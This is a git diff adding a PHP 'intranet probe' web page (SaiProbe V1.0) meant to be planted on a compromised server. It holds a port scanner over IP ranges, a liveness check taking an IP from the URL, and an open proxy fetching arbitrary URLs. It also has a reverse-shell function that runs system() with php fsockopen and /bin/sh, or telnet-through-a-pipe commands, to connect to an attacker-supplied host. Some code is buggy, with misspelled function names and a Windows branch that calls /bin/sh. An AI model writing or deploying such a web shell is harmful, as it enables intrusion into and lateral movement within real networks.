diff --git a/php/SaiProbe/SaiProbe_v1.0.php b/php/SaiProbe/SaiProbe_v1.0.php new file mode 100644 index 0000000..b41e515 --- /dev/null +++ b/php/SaiProbe/SaiProbe_v1.0.php @@ -0,0 +1,257 @@ +port=array('20','21','22','23','69','80','81','110','139','389','443','445','873','1090','1433','1521','2000','2181','3306','3389','5632','5672','6379','7001','8000','8069','8080','8081','9200','10050','10086','11211','27017','28017','50070'); + } + //url格式处理函数 + function urlFilter($url){ + $pattern="/^(\d{1,2}|1\d\d|2[0-4]\d|25[0-5])(\.(\d{1,2}|1\d\d|2[0-4]\d|25[0-5])){3}$/"; + $match=preg_match($pattern,$url); + if(!$match){ + echo ""; + exit("再检查检查吧……"); + } + $url=str_replace("http://", "",$url); + $url=str_replace("/", "",$url); + return $url; + } + function Prepare(){ + if($_POST['end']!=""){ + $base_url_1=self::urlFilter($_POST['start']); + $base_url_2=self::urlFilter($_POST['end']); + /*$base_url_1=$_POST['start']; + $base_url_2=$_POST['end'];*/ + $base_url=array($base_url_1,$base_url_2); + + self::Scan($base_url,$this->port); + }else{ + echo ""; + } + } + function outPut(){ + + } + function Scan($base_url,$port){ + $start=explode('.',$base_url['0']); + $end=explode('.',$base_url['1']); + $length=$end['3']-$start['3']; + for($i=0;$i<=$length;$i++){ + $ip=$start[0].".".$start[1].".".$start[2].".".($start[3]+$i); + foreach ($port as $ports) { + $ips="$ip:$ports"; + //stream_set_blocking($ips, 0); + //$result=stream_socket_client($ips,$errno, $errstr,0.1,STREAM_CLIENT_CONNECT); + $result=@fsockopen($ip,$ports,$errno,$errstr,0.1); + if($result){ + echo $ip."---------------------".$ports."端口开放"."
"; + flush(); + } + } + } + } + }//===================================存活探测函数============================== + function ssrf($ip,$port=80){ + $res=fsockopen($ip,$port,$errno,$errstr,0.2); + if($res){ + echo "该地址存活的!!!!!!"; + }else{ + echo "不存活!"; + } + + }//============================端口转发函数===================================== + function tansmit($sourceip,$sourceport,$targetip,$targetport){ + if(strtsr(php_uname(),'Windows')){ + + }elseif (strstr(php_uname(), 'Linux')) { + + }else{ + + } + }//============================Shell反弹函数==================================== + function bounce($targetip,$targetport){ + if(substr(php_uname(), 0,1)=="W"){ + system("php -r '$sock=fsockopen($targetip,$targetport);exec('/bin/sh -i <&3 >&3 2>&3');'"); + }elseif (substr(php_uname(), 0,1)=="L") { + echo 'linux test'; + system('mknod inittab p && telnet {$targetip} {$targetport} 0inittab'); + }else{ + echo ""; + } + }//==============================在线代理函数==================================== + function proxy($url){ + $output=file_get_contents($url); + return $output; + }//======================================Main=================================== + $scan=new portScan(); + if(isset($_POST['submit'])){ + if($_POST['start']!=""){ + $scan->Prepare(); + }else{ + echo ""; + } + } + + if(isset($_GET['ip'])){ + $ssrf_ip=$_GET['ip']; + if($ssrf_ip!=0){ + ssrf($ssrf_ip); + } + } + + if(isset($_POST['trans'])) { + tranmit($_POST['sourceip'],$_POST['sourceport'],$_POST['targetip'],$_POST['targetport']); + } + + if(isset($_POST['rebound'])){ + bounce($_POST['tarip'],$_POST['tarport']); + } + if (isset($_GET['proxy'])) { + $proxy_web=proxy($_GET['proxy']); + echo "
".$proxy_web."
"; + }?> Sai 内网探针V1.0 + +
+

SaiProbe V1.0

+
+ 基本信息|反弹转发|命令执行|端口扫描|存活探测|phpinfo|代理访问|更多功能 +
+
+ +
+
+ 基本信息 + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
服务器IP/地址()
当前用户
网站目录
探针所在目录
服务器端口
服务器标识
PHP版本
PHP安装路径
+
+
+ + + + + +
Code by Sai